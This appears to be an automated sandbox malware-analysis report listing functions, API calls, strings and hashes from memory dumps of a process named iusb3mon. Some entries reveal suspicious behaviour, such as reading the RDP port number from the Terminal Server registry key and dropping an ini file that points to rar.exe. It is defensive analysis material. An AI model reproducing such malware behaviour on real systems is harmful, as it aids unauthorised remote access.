Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: 9f3d80bdb2c8b188412fc3eb23ce2c2efc5ccb4e15257d5b4b91e7039cdee1de
Instruction ID: de189fdb02d66f401e45dbc348a9ad4c6492fa1facc3122785726a6720ff4823
Opcode Fuzzy Hash: 9f3d80bdb2c8b188412fc3eb23ce2c2efc5ccb4e15257d5b4b91e7039cdee1de
Instruction Fuzzy Hash: 2C317F75210705EFD764DF14D899E66B7A9FB44760F008519E966CB680DBB0E805CF60

Function 062A9ED2 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062A9ED7
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 062A9F24
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 062A9F46
GetCapture.USER32 ref: 062A9F58
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 062A9F67
WinHelpA.USER32(?,?,?,?), ref: 062A9F7B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 0b9c90d53d98d1ed38fbd681b94c218e42e2978b598c8862bf0dedfdabb0ebdd
Instruction ID: c3d07680d946db0638772fa62f46322c3ec9d12125300d5ab68291a962de6206
Opcode Fuzzy Hash: 0b9c90d53d98d1ed38fbd681b94c218e42e2978b598c8862bf0dedfdabb0ebdd
Instruction Fuzzy Hash: CC218171610309BFEBA06F64DC88EBA77BAEF48750F154528FA519B1E1CAF19C009B10

Function 062AC0EA Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 062AC11D
GetLastActivePopup.USER32(?), ref: 062AC12C
IsWindowEnabled.USER32(?), ref: 062AC141
EnableWindow.USER32(?,00000000), ref: 062AC154
GetWindowLongA.USER32(?,000000F0), ref: 062AC166
GetParent.USER32(?), ref: 062AC174

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 2813ad28c00ced190e2b9fb26bc97f8ac0c59c9c15dd4ea2aaf05645f354a8a8
Instruction ID: b29f42ca0800e8188a7bc165b7b9f30c8dd874fe990dcfe1e24d89f02beb43f7
Opcode Fuzzy Hash: 2813ad28c00ced190e2b9fb26bc97f8ac0c59c9c15dd4ea2aaf05645f354a8a8
Instruction Fuzzy Hash: 9311E532F313279BD7B16A695C84B7BB69C5F56FA1F060128ED01E7304DBE4C8028AE1

Function 0629EDA1 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,0629B691,0629B6E5,?,?,?), ref: 0629EDD9
VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,0629B691,0629B6E5,?,?,?), ref: 0629EDE4
HeapFree.KERNEL32(00000000,?,?,?,?,?,0629B691,0629B6E5,?,?,?), ref: 0629EDF1
HeapFree.KERNEL32(00000000,?,?,?,?,0629B691,0629B6E5,?,?,?), ref: 0629EE0D
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0629B691,0629B6E5,?,?,?), ref: 0629EE2E
HeapDestroy.KERNEL32(?,?,0629B691,0629B6E5,?,?,?), ref: 0629EE40

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Free$HeapVirtual$Destroy
String ID:
API String ID: 716807051-0
Opcode ID: 6a66e9b37648daf4f95c7f74e97d90e298b26c68af21c92a85b59712fd5ae9ef
Instruction ID: 44dc60ecc52d5109f1e72961eeb2b4d0661da8f7ef76319a62b4edc6f4a6e280
Opcode Fuzzy Hash: 6a66e9b37648daf4f95c7f74e97d90e298b26c68af21c92a85b59712fd5ae9ef
Instruction Fuzzy Hash: D9118235660315AFDA619E10FC89F167BA6FBC0730F224424FBC162590C6796881DF25

Function 062AB866 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 062AB875
GetWindow.USER32(?,00000005), ref: 062AB886
GetDlgCtrlID.USER32(00000000), ref: 062AB88F
GetWindowLongA.USER32(00000000,000000F0), ref: 062AB89E
GetWindowRect.USER32(00000000,?), ref: 062AB8B0
PtInRect.USER32(?,?,?), ref: 062AB8C0

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 33cfe0de0a3fd4d2f344552064748791e2d7188b8dca0dca107d706ab249b896
Instruction ID: 55192b4e7198394d828ae583f560bfc7f7c9142a5db026614ae17fae41d9bb05
Opcode Fuzzy Hash: 33cfe0de0a3fd4d2f344552064748791e2d7188b8dca0dca107d706ab249b896
Instruction Fuzzy Hash: 5001783251131AAFEB119A68AC0CEEE7B6DFF45352F014421FE51A2094E6B49516DF90

Function 06297550 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0629758B

Part of subcall function 062991B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06299216
Part of subcall function 062991B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0629922E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0629923E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0629924E
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0629925B
Part of subcall function 062991B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06299268
Part of subcall function 062991B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062993F3

lstrlenA.KERNEL32(00000080), ref: 062975B9
lstrlenA.KERNEL32(00000080), ref: 062975C5

Strings

SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s, xrefs: 06297585
PortNumber, xrefs: 0629759F
3389, xrefs: 062975BF, 062975C4

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
API String ID: 4274792114-3034822107
Opcode ID: 354ee2733daf5c4054ed17835a4b664180db92dc542cd117feab5ee9ef1cd0ed
Instruction ID: a2910f1775c055301c15611444671be1bca351f765c7747c6c18370504b9e7f6
Opcode Fuzzy Hash: 354ee2733daf5c4054ed17835a4b664180db92dc542cd117feab5ee9ef1cd0ed
Instruction Fuzzy Hash: 6CF081B291022877CF606A619C09FEB7E2DEF856A8F054459BF08B2000D670E556DBB5

Function 06298332 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(75B30000), ref: 0629834A
FreeLibrary.KERNEL32(6F4E0000), ref: 06298354
FreeLibrary.KERNEL32(?), ref: 0629835E
FreeLibrary.KERNEL32(?), ref: 06298368
FreeLibrary.KERNEL32(75BB0000), ref: 06298372
FreeLibrary.KERNEL32(761A0000), ref: 0629837C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e916c77844799c8036296d67bd316a3f41b6cce2050bf96fd428cd8f35d6249
Instruction ID: 6b34e0cefc68acd0b22c66d8ea7964bd55bbfb83e2d2419b0df6154ec31644ff
Opcode Fuzzy Hash: 5e916c77844799c8036296d67bd316a3f41b6cce2050bf96fd428cd8f35d6249
Instruction Fuzzy Hash: 73F0E770B107069BDB70AE7ADC44B57F3ECAF91A50B0A4D1AA885D3650DAB8E845CA34

Function 062AB632 Relevance: 9.0, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 062AB63F
GetSystemMetrics.USER32(0000000C), ref: 062AB646
GetDC.USER32(00000000), ref: 062AB65F
GetDeviceCaps.GDI32(00000000,00000058), ref: 062AB670
GetDeviceCaps.GDI32(00000000,0000005A), ref: 062AB678
ReleaseDC.USER32(00000000,00000000), ref: 062AB680

Part of subcall function 062ACD61: GetSystemMetrics.USER32(00000002), ref: 062ACD73
Part of subcall function 062ACD61: GetSystemMetrics.USER32(00000003), ref: 062ACD7D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: a6ea5062b0cdd91b51daa5b0661fecc3575abd8f60ded7a561ed45ef4f0c51a2
Instruction ID: 1e00bfaefb4f2b7db4d45c8cf17115a254cfbc0cac83506574fa7907230ebcd1
Opcode Fuzzy Hash: a6ea5062b0cdd91b51daa5b0661fecc3575abd8f60ded7a561ed45ef4f0c51a2
Instruction Fuzzy Hash: 9CF03070640700ABE6606B719C8DF27BBA5EB81B52F01452EEB81566D0DAF49805DEA1

Function 0629EBFC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 0629EC1B
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0629EC50
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0629ECB0

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 0629EC8A
__MSVCRT_HEAP_SELECT, xrefs: 0629EC4B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: c6d971fa41271025a202a5f7e772bce38f9341cf06c86e27ea311b4c1ce38080
Instruction ID: 4cfa6f5987b0653953e6f2aa06f50d30a393e158df3ba4590292a4229c375010
Opcode Fuzzy Hash: c6d971fa41271025a202a5f7e772bce38f9341cf06c86e27ea311b4c1ce38080
Instruction Fuzzy Hash: A4313571C352896EEFB5C6306C54AED3B6CAF86300F1904D9DDC4C6281E6718AC6CB31

Function 062A99BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 062A9A74
GetWindowLongA.USER32(?,000000FC), ref: 062A9A85
GetWindowLongA.USER32(?,000000FC), ref: 062A9A95
SetWindowLongA.USER32(?,000000FC,?), ref: 062A9AB1

Strings

(, xrefs: 062A9A5F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: dbcc1d33d260d3128a4e58ea65449067734334730bb6ad3b40372189581af488
Instruction ID: ade41019ffec2f4812043ca4e3e81dfb6209038821e52bca05fd87097e4f3c2b
Opcode Fuzzy Hash: dbcc1d33d260d3128a4e58ea65449067734334730bb6ad3b40372189581af488
Instruction Fuzzy Hash: E131C530E207029FDBA0AF66C984B69B7F5BF44310F15422EE99697691DBB0E884CF51

Function 0034DB3E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A302B08A,?,?,00000000,0035DA11,000000FF,?,0034DACE,?,?,0034DAA2,00000016), ref: 0034DB73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0034DB85
FreeLibrary.KERNEL32(00000000,?,00000000,0035DA11,000000FF,?,0034DACE,?,?,0034DAA2,00000016), ref: 0034DBA7

Strings

mscoree.dll, xrefs: 0034DB6C
CorExitProcess, xrefs: 0034DB7D

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d0a332ad4a2d6c3f2a2ae7fcfdf321e0c7cc4713cbc545655fc0ec5ceeb4c52a
Instruction ID: 3c0d57ff7402783575d77c3fa0f0f5cfe810a6bd67caf39dfcbc976e3f9f49ce
Opcode Fuzzy Hash: d0a332ad4a2d6c3f2a2ae7fcfdf321e0c7cc4713cbc545655fc0ec5ceeb4c52a
Instruction Fuzzy Hash: 06016271954759AFDB179F54CC09FAFBBBCFB44B12F014525E812A62A0DBB49A00CA90

Function 0629892C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 062988DD: EnterCriticalSection.KERNEL32(?,?,?,06298958,00000005,00000005), ref: 062988E5
Part of subcall function 062988DD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,06298958,00000005,00000005), ref: 062988FD

LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 0629895D
GetProcAddress.KERNEL32(00000000,closesocket), ref: 0629896B
FreeLibrary.KERNEL32(00000000), ref: 0629897F

Strings

ws2_32.dll, xrefs: 06298958
closesocket, xrefs: 06298965

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
String ID: closesocket$ws2_32.dll
API String ID: 2819327233-181964208
Opcode ID: 6ce7132db62719e910d7bd73063c2cac7310d9a8ba0a75b566562369e97bed1b
Instruction ID: e4287a48077464b4ebbc2815ce62efc74c07d50822c54d724e7b75a6711a9699
Opcode Fuzzy Hash: 6ce7132db62719e910d7bd73063c2cac7310d9a8ba0a75b566562369e97bed1b
Instruction Fuzzy Hash: 0BF096765102057BDB515B54EC4DEEF7B6DDBC57A1F060129BE4592240EAB09900CAB1

Function 0629386B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 0629387D
GetSystemMetrics.USER32(00000001), ref: 06293881
ChangeDisplaySettingsA.USER32(?,00000000), ref: 062938B4
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 062938C9

Strings

, xrefs: 06293892

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ChangeDisplayMetricsSettingsSystem
String ID:
API String ID: 2205422386-3916222277
Opcode ID: 3a6d5d7cf691418a71045183a01cb295601586276396873224cf1d83bf747617
Instruction ID: d67194aad8eb11972ad4e3e11dc07528596808fb6fe7faf42a6b4f4610d85a59
Opcode Fuzzy Hash: 3a6d5d7cf691418a71045183a01cb295601586276396873224cf1d83bf747617
Instruction Fuzzy Hash: 5FF03A71D2532DEAFF20DBA49C09F8E7BBCAB04748F100055AA08B71C1D3F065098FA1

Function 06292A15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06292661,c:\inst.ini), ref: 06292A2B
WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06292661,c:\inst.ini), ref: 06292A40
CloseHandle.KERNEL32(00000000,?,06292661,c:\inst.ini), ref: 06292A4D

Strings

c:\inst.ini, xrefs: 06292A1B
C:\\rar.exe, xrefs: 06292A3A

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\\rar.exe$c:\inst.ini
API String ID: 1065093856-1710477331
Opcode ID: d2c3a3fda65be5fe696b265af8e81dbbbe837d93db5f075d652b02ce50f328de
Instruction ID: bd8551de84eda4f390eb5aae23e1382f8a470b3fe92a2fd757cdefc64fa155b9
Opcode Fuzzy Hash: d2c3a3fda65be5fe696b265af8e81dbbbe837d93db5f075d652b02ce50f328de
Instruction Fuzzy Hash: FCE0D871242319BFFA201D60BCCAFEB3B0EEB057D8F000121FF0495140D6918D018AB0

Function 06297639 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,062979A5,?,?,?), ref: 06297642
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 06297654
FreeLibrary.KERNEL32(00000000), ref: 06297676

Strings

